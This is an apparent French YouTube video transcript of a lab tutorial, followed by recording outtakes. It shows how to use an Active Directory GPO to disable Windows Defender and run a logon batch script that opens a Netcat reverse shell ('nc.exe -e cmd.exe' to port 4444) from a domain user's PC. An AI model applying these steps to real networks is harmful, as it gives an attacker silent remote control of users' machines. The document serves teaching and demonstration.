Et bonjour à tous, aujourd'hui on se rejoint pour une nouvelle vidéo où on va voir comment ouvrir un shell à distance via une GPO. Alors j'ai toujours entendu dire qu'il était possible de faire n'importe quoi via les stratégies de groupe dans un environnement Active Directory. Et donc j'ai voulu vérifier ça et je me suis dit on va pousser un peu le vice, on va essayer d'ouvrir un shell à distance via une GPO. Alors pour ce tutoriel en fait je vais utiliser Netcat, le binaire Netcat compilé pour Windows. Mais évidemment, tous ceux qui l'utilisent le savent, Windows Defender, il aime pas trop Netcat. Donc du coup, via la GPO, on va dans un premier temps désactiver Windows Defender et ensuite on va lancer un script batch à l'ouverture de session de notre utilisateur du domaine pour lancer une connexion Netcat en direction de notre serveur sur lequel on aura lancé Netcat en mode écoute. Pour le tutoriel d'aujourd'hui, on utilisera donc un poste sous serveur 2016, donc qui est contrôleur de domaine. J'ai déjà créé un Active Directory avec plusieurs utilisateurs dans le domaine, un utilisateur processus, un utilisateur Janine. Ici, si je déroule les users, on voit qu'on a un Janine Dupont et un processus Tief. On se servira donc d'un de ces deux utilisateurs, vous verrez lequel tout à l'heure, pour pouvoir ouvrir une session et donc lancer un shell via une GPO. Et donc cet ordinateur-là qui est sous Windows 10 professionnel, ce sera l'ordinateur de notre victime sur lequel on va envoyer notre GPO. Notre serveur 2016, évidemment, c'est un contrôleur de domaine, donc il a une IP fixe. Si je vais dans ncpa.cpl pour ouvrir les cartes réseau, ici je vais dans statut, détails, on en voit qu'ici on est en 66.247. Les serveurs DNS, donc j'ai mis 1.1.1, donc l'adresse de Cloudflare, et il a également en DNS primaire 127.0.0.1, donc lui-même évidemment pour le domaine. La première chose qu'on va faire du coup, c'est d'insérer notre client Windows 10 dans notre domaine. Pour intégrer notre client au domaine, rien de plus simple. Ici, je fais un clic droit, exécuter. Je vais taper ncpa.cpl pour ouvrir donc la liste des cartes réseau comme on l'a fait sur notre serveur. Et donc ici, sur la carte, je vais faire propriété. Je vais aller dans les options IPv4 et je vais fixer des DNS. Donc ici, pour le DNS primaire, on va mettre l'adresse IP de notre contrôleur de domaine. Donc on a vu qu'il était en 66.247. Et en auxiliaire, je vais mettre 1.1.1.1 pour qu'il ait un accès, une résolution sur Internet. Ici, ensuite, si je vais dans le panneau de config, après dans système et sécurité, système, ici dans modifier les paramètres, je vais cliquer sur modifier et je vais pouvoir ajouter mon poste client au domaine. Notre domaine ici c'est processus.local. Il me faut donc un accès administrateur pour joindre le domaine de notre serveur. J'attends quelques secondes. Bienvenue dans le domaine processus.local et ensuite je dois donc redémarrer ma machine. Et une fois qu'elle sera redémarrée, je pourrai ouvrir une session en tant qu'un utilisateur du domaine qui a les privilèges d'utilisateur du domaine. Voilà, donc le poste a redémarré et donc tout de suite je peux ouvrir une session en tant qu'un autre utilisateur. On va prendre donc notre fameuse Janine Dupont. Et donc ici on peut ouvrir la session puisqu'elle fait partie des membres utilisateurs du domaine. Et donc c'est sur le poste de Janine qu'on va pouvoir lancer un script batch avec donc une connexion Netcat. Donc ici, pendant que le poste de Janine prépare sa session, on va voir tout de suite que dans Outils, on a un outil gestion des stratégies de groupe qui nous permet en fait de déployer des GPO dans mon domaine processus.local. Ici, on a la GPO par défaut du domaine et donc ici, on va faire un clic droit sur notre domaine et faire créer un objet GPO dans ce domaine. On va l'appeler Netcat par exemple. Et donc ici, je vais pouvoir modifier cette stratégie de groupe. Ici, on voit le scope. Donc la GPO sera appliquée sur tous les utilisateurs authentifiés. Donc clic droit, modifier. Et à partir de là, je vais pouvoir modifier, ajouter une stratégie ou des préférences, donc une stratégie de groupe, soit sur l'ordinateur, soit sur l'utilisateur. Dans un premier temps, ce qui va nous intéresser, c'est de désactiver Windows Defender. Pour ça, on va l'appliquer sur une stratégie ordinateur, puisque l'utilisateur en lui-même n'aura pas les droits de désactiver Windows Defender. Janine est juste un utilisateur normal, donc elle n'aura pas les privilèges administrateurs pour le désactiver. En revanche, le script batch, lui, on va le mettre dans les préférences utilisateurs.
puisque c'est un script qui va se lancer avec les privilèges de l'utilisateur et non de l'ordinateur. Dans un premier temps, pour désactiver Windows Defender, donc on va aller dans la configuration ordinateur, on va dérouler les stratégies, on va ensuite aller dans modèle d'administration, on va choisir composants Windows, et ici on va pouvoir retrouver Windows Defender. Ici on a désactivé Windows Defender. Si je double-clique dessus, ici, si j'active ce paramètre, Windows Defender ne s'exécute pas et la recherche de programmes malveillants et autres programmes potentiellement indésirables n'est pas effectuée. Donc on va l'activer et je vais pouvoir donc l'appliquer. Ici, lorsque ma GPO va s'appliquer sur mon poste client, eh bien Windows Defender va se désactiver. Donc ensuite, il ne me reste plus qu'à créer donc mon script batch pour pouvoir ensuite créer une GPO pour l'activer à l'ouverture de session. Sur mon serveur, j'ai déjà téléchargé les binaires de Netcat, ils se trouvent dans mes documents. Ici, j'ai un Netcat, donc je vais prendre le NC en 32 bits. Je vais aller dans le répertoire netlogon de mon domaine, donc ici je vais en 2/processus.local et ici j'ai l'accès à netlogon et à sysvol. Je vous rappelle que netlogon, c'est le répertoire en fait où doivent se trouver les scripts du domaine. Si je vais dans sysvol, ici je retrouve mon domaine et à l'intérieur j'ai un script. Et en fait ce répertoire script, ici je vais y coller mon netcat, on va voir que ce répertoire script, c'est en fait le répertoire netlogon. Si je retourne dans processus.local, netlogon, je retrouve bien mon nc.exe, donc c'était bien dans mon répertoire sysvol, mon domaine et script. Le répertoire sysvol, localement sur le poste, il se trouve ici, c'est en C2. Windows, sysvol, et ensuite sysvol. Là, j'ai à nouveau mon domaine, script, et je retrouve bien mon netcat. Je retourne donc sur processus.local, netlogon, et ici donc j'ai bien mon netcat. Je vais donc faire un clic droit, nouveau texte. Je vais faire afficher les extensions de nom de fichier. Et je vais renommer tout cela en processus, par exemple .bat. Tac. Ici, je vais faire un clic droit modifier. Et donc, je vais simplement faire un processus.local /netlogon /nc.exe -e, je redirige vers cmd.exe et j'envoie ma connexion vers donc, mon serveur en 66.247 sur le port 4444. Ici, j'ouvre une invite de commande. Je vais faire la même chose, donc /processus.local netlogon nc.exe nlvp 4444. Ici, donc, j'écoute sur n'importe quelle interface sur le port 4444. Et donc ensuite, dans ma GPO, je vais pouvoir créer une stratégie utilisateur. Donc ici, je vais aller dans paramètres Windows, script ouverture fermeture, et là je vais pouvoir déployer un script à l'ouverture de session. Je fais ajouter, et ici je vais rechercher mon script toujours sur mon 2/processus.local netlogon, et ici je vais prendre mon processus.bat. Ok, j'applique cette GPO. Ici, je peux fermer. Je vois que donc ma GPO est activée pour les utilisateurs authentifiés. Sur le poste de Janine, j'ouvre une invite de commande. Donc ici, je vous rappelle que je n'ai pas de privilège utilisateur. Si je fais un echo 1 vers c2.windows toto, eh bien, accès refusé. En revanche, je peux faire un gp update /force, donc pour forcer la mise à jour des stratégies de groupe. Donc ici, il va forcer une mise à jour des stratégies utilisateurs et stratégies d'ordinateur. Ça, généralement, ça se fait à peu près toutes les 4 heures, si je ne dis pas de bêtises, automatiquement. Mais ici, on peut la forcer manuellement. Donc ici, voilà, la mise à jour des stratégies de groupe s'est terminée sans erreur. Et bien à partir de là, je vais redémarrer le poste pour qu'il prenne en compte les stratégies de groupe qui ont été appliquées. Et donc, quand je vais ouvrir la session de Janine, je vais pouvoir recevoir donc, une connexion sur le Netcat que j'ai lancé ici en écoute sur le serveur. Voilà, et donc une fois que le poste est redémarré, si je rouvre la session de Janine, donc la stratégie de groupe ordinateur a désactivé Windows Defender et donc la stratégie de groupe utilisateur va lancer à l'ouverture de session le script processus.bat qui se trouve dans le répertoire netlogon, donc le répertoire qui est accessible à tous les utilisateurs et ordinateurs du domaine en lecture seule sur le domaine.
Et donc ce processus va lancer donc cmd.exe, l'invite de commande, et rediriger le canal vers notre serveur sur le port 4444 sur lequel on a un Netcat en écoute. Ici, on voit qu'on a récupéré la main de 66.110, donc c'est l'ordinateur de Janine. Si je fais un Who am I, donc ça met un petit peu de temps à me répondre. Voilà, on voit qu'on est en tant que Janine. Et si je fais un notepad, eh bien ça ouvre un bloc-notes directement sur son poste. Donc j'ai bien la main sur le poste. Je peux même d'ailleurs faire l'habituel shutdown/st00. Et ici, on voit que le poste s'arrête. Bref, j'ai la main complète, je peux faire absolument ce que je veux à partir de là sur le poste. Et donc, on a vu que c'était possible d'avoir un reverse shell via une GPO sur un parc Active Directory. Bref, c'est tout pour aujourd'hui. J'espère que vous aurez aimé cette vidéo. Si c'est le cas, n'hésitez pas à mettre un petit pouce bleu, à vous abonner à la chaîne si ce n'est pas déjà fait. J'ai également un blog https://lestutos de processus.fr. Le lien est en description de cette vidéo. Avant de vous quitter, je voulais simplement vous parler de 50 nuances d'octet. Ils se définissent eux-mêmes comme étant un micromédia qui traite de l'actualité tech, cyber et numérique, animé par Sicursen, Notels, Nicolas et d'autres contributeurs. Ils ont un Twitter, ils ont une chaîne YouTube et également un site internet. Je vous mettrai tous les liens en description de cette vidéo. J'adore leur podcast. Malheureusement, la saison 1 va s'achever très prochainement. J'espère très sincèrement qu'il y aura une saison 2. J'ai discuté avec Sicursen par message privé tout à l'heure et franchement, je croise les doigts pour que ça revienne très vite. Bref, moi je vous dis à très vite pour de nouveaux tutoriels et d'ici là, portez-vous bien. Ça m'a l'air pas mal. Allez, on va lancer le recording. Et puis c'est parti. Alors, toc, démarrer l'enregistrement. Donc là ça rec. Quand il aura fini de bugger, parce que ça fait 2 fois qu'il me fait un blue screen. Bon, on va aller se faire un café. En fait, avec Windows, quand tu redémarres, tu sais jamais si ça va bien se passer, tu vois. Alors qu'avec Linux, et bah quand c'est la merde, même si tu redémarres, ça peut pas être pire quoi. Bon, t'as fini mon copain? Pour intégrer notre poste client au domaine, rien de plus simple, donc clic droit, exécuter, on va ouvrir ncpa.cpl également pour accéder aux cartes réseau de l'ordinateur. Oh, putain, ça me saoule ça gros. Qu'est-ce qu'il fait là? Allô? Veuillez patienter, putain il va me faire une réparation automatique, ça fait 40 minutes que j'essaye de le démarrer. Bon. C'est bien, j'avais prévu une petite heure pour faire ce tutoriel, ça fait déjà 46 minutes. N'empêche, il y avait le slogan « Il est chez Free, il a tout compris ». Moi, je propose qu'il est sous Windows, il voit plus la vie en rose, quoi. Parce que là, franchement... Allez, on recommence.